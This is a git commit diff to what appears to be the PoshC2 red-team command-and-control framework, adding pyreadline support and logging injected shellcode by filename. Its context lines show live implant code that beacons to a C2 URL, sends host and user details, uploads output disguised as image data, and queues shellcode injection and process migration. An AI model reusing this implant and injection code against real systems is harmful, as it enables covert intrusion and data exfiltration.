Use pyreadline for Windows compatibility and when injecting shellcode log filename

temp
m0rv4i 2019-04-24 18:18:30 +01:00
parent ae3c5ed3cf
commit 0aaa5ce53c
11 changed files with 36 additions and 31 deletions

View File

@ -1,4 +1,5 @@
#!/usr/bin/env python #!/usr/bin/env python
import os
from UrlConfig import UrlConfig from UrlConfig import UrlConfig
HOST_NAME = '0.0.0.0' HOST_NAME = '0.0.0.0'
@ -56,12 +57,12 @@ ServerHeader = "Apache"
Insecure = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}" Insecure = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
# DO NOT CHANGE # # DO NOT CHANGE #
FilesDirectory = "%sFiles/" % POSHDIR FilesDirectory = "%sFiles%s" % (POSHDIR, os.sep)
PayloadsDirectory = "%spayloads/" % ROOTDIR PayloadsDirectory = "%spayloads%s" % (ROOTDIR, os.sep)
ModulesDirectory = "%sModules/" % POSHDIR ModulesDirectory = "%sModules%s" % (POSHDIR, os.sep)
DownloadsDirectory = "%sdownloads/" % ROOTDIR DownloadsDirectory = "%sdownloads%s" % (ROOTDIR, os.sep)
ReportsDirectory = "%sreports/" % ROOTDIR ReportsDirectory = "%sreports%s" % (ROOTDIR, os.sep)
Database = "%s/PowershellC2.SQLite" % ROOTDIR Database = "%s%sPowershellC2.SQLite" % (ROOTDIR, os.sep)
# DO NOT CHANGE # # DO NOT CHANGE #
# These rules aren't needed as you'll find them auto-generated within the project folder now. # These rules aren't needed as you'll find them auto-generated within the project folder now.

View File

@ -1,9 +1,9 @@
#!/usr/bin/python #!/usr/bin/python
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob, readline, pyreadline.rlmain
from Config import HTTPResponses, POSHDIR, PayloadsDirectory from Config import HTTPResponses, POSHDIR, PayloadsDirectory
from Utils import randomuri from Utils import randomuri
from TabComplete import readline, tabCompleter from TabComplete import tabCompleter
from Help import COMMANDS from Help import COMMANDS
def default_response(): def default_response():

View File

@ -77,7 +77,7 @@ public class Program
x.Headers.Add("Referrer", "#REPLACEREFERER#"); x.Headers.Add("Referrer", "#REPLACEREFERER#");
if (null != cookie) if (null != cookie)
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}"); x.Headers.Add(System.Net.HttpRequestHeader.Cookie, String.Format("SessionID={0}", cookie));
return x; return x;
} }
@ -188,7 +188,7 @@ public class Program
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE"); var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id; int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir"); Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#"; var o = String.Format("{0};{1};{2};{3};{4};#REPLACEBASEURL#", dn, u, cn, arch, pid);
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#"; String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
var primer = GetWebRequest(Encryption(key, o)).DownloadString(s); var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
@ -331,7 +331,7 @@ public class Program
internal static String GenerateUrl() internal static String GenerateUrl()
{ {
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)]; string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}"; return String.Format("{0}/{1}{2}/?{3}", _baseUrl, URL, Guid.NewGuid(), _randomURI);
} }
} }
@ -502,7 +502,7 @@ public class Program
beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value); beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
} }
else else
output.AppendLine($@"[X] Invalid time ""{c}"""); output.AppendLine(String.Format(@"[X] Invalid time ""{0}""", c));
} }
output.AppendLine(strOutput.ToString()); output.AppendLine(strOutput.ToString());
@ -519,7 +519,7 @@ public class Program
catch (Exception e) catch (Exception e)
{ {
var task = Encryption(Key, "Error"); var task = Encryption(Key, "Error");
var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true); var eroutput = Encryption(Key, String.Format("Error: {0} {1}", output.ToString(), e), true);
var outputBytes = System.Convert.FromBase64String(eroutput); var outputBytes = System.Convert.FromBase64String(eroutput);
var sendBytes = ImgGen.GetImgData(outputBytes); var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes); GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);

View File

@ -1,6 +1,6 @@
#!/usr/bin/python #!/usr/bin/python
import sys, re, os, readline, time, subprocess, traceback, signal, argparse import sys, re, os, time, subprocess, traceback, signal, argparse, readline, pyreadline.rlmain
from sqlite3 import Error from sqlite3 import Error
from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails

View File

@ -1,4 +1,4 @@
import base64, re, traceback, os, sys import base64, re, traceback, os, sys, readline, pyreadline.rlmain
from Alias import ps_alias from Alias import ps_alias
from Colours import Colours from Colours import Colours
from Utils import randomuri, validate_sleep_time from Utils import randomuri, validate_sleep_time
@ -10,7 +10,7 @@ from Core import readfile_with_completion, filecomplete
from Opsec import ps_opsec from Opsec import ps_opsec
from Payloads import Payloads from Payloads import Payloads
from Utils import argp, load_file, gen_key from Utils import argp, load_file, gen_key
from TabComplete import readline, tabCompleter from TabComplete import tabCompleter
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload): def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
try: try:
@ -406,7 +406,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
shellcodefile = load_file(path) shellcodefile = load_file(path)
if shellcodefile != None: if shellcodefile != None:
arch = "64" arch = "64"
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri) new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri) new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
except Exception as e: except Exception as e:
print ("Error loading file: %s" % e) print ("Error loading file: %s" % e)
@ -471,13 +471,16 @@ def migrate(randomuri, user, params=""):
arch = "86" arch = "86"
if implant_comms == "Normal": if implant_comms == "Normal":
shellcodefile = load_file("%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)) path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
shellcodefile = load_file(path)
elif implant_comms == "Daisy": elif implant_comms == "Daisy":
daisyname = raw_input("Name required: ") daisyname = raw_input("Name required: ")
shellcodefile = load_file("%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch)) path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch)
shellcodefile = load_file(path)
elif implant_comms == "Proxy": elif implant_comms == "Proxy":
shellcodefile = load_file("%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)) path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
shellcodefile = load_file(path)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user) check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri) new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri) new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)

View File

@ -190,7 +190,8 @@ class Payloads(object):
output_file.write(cs9) output_file.write(cs9)
output_file.close() output_file.close()
if os.name == 'nt': if os.name == 'nt':
compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe %s%sdropper.cs -o %s%sdropper_cs.exe" % (self.BaseDirectory, name, self.BaseDirectory, name) compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:library -out:%s%sdropper_cs.dll %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
compileexe = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:exe -out:%s%sdropper_cs.exe %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
else: else:
compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name) compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name) compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)

View File

@ -75,7 +75,7 @@ def handle_sharp_command(command, user, randomuri, startup):
try: try:
shellcodefile = load_file(path) shellcodefile = load_file(path)
if shellcodefile != None: if shellcodefile != None:
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri) new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile),params, os.path.basename(path)), user, randomuri)
except Exception as e: except Exception as e:
print ("Error loading file: %s" % e) print ("Error loading file: %s" % e)

View File

@ -1,6 +1,6 @@
#!/usr/bin/python #!/usr/bin/python
import os, sys, readline, glob import os, sys, readline, pyreadline.rlmain, glob
class tabCompleter(object): class tabCompleter(object):
""" """

View File

@ -19,12 +19,9 @@ def newTask(path):
user_command = command user_command = command
hostinfo = DB.get_hostinfo(RandomURI) hostinfo = DB.get_hostinfo(RandomURI)
now = datetime.datetime.now() now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode64")) : if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode")) :
user_command = command[0:150]+"......TRUNCATED......"+command[-80:] user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
elif (command.lower().startswith("run-exe core.program core inject-shellcode")) : command = command[:command.index("#")]
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
elif (command.lower().startswith("$shellcode86")) or (command.lower().startswith("$shellcode86")) :
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
elif (command.lower().startswith('upload-file')): elif (command.lower().startswith('upload-file')):
filepath = command.replace('upload-file', '') filepath = command.replace('upload-file', '')
if ";" in filepath: if ";" in filepath:

View File

@ -14,6 +14,8 @@ Add a configurable jitter to all implants
Update the notifications config if it is changed in the Config.py Update the notifications config if it is changed in the Config.py
Add NotificationsProjectName in Config.py which is displayed in notifications message Add NotificationsProjectName in Config.py which is displayed in notifications message
Add fpc script which searches the Posh DB for a particular command Add fpc script which searches the Posh DB for a particular command
Use pyreadline for Windows compatibility
Modify InjectShellcode logged command to remove base64 encoded shellcode and instead just log loaded filename
4.8 (13/02/19) 4.8 (13/02/19)
============== ==============

View File

@ -2,3 +2,4 @@ pyopenssl
pandas pandas
pyttsx3 pyttsx3
pycrypto pycrypto
pyreadline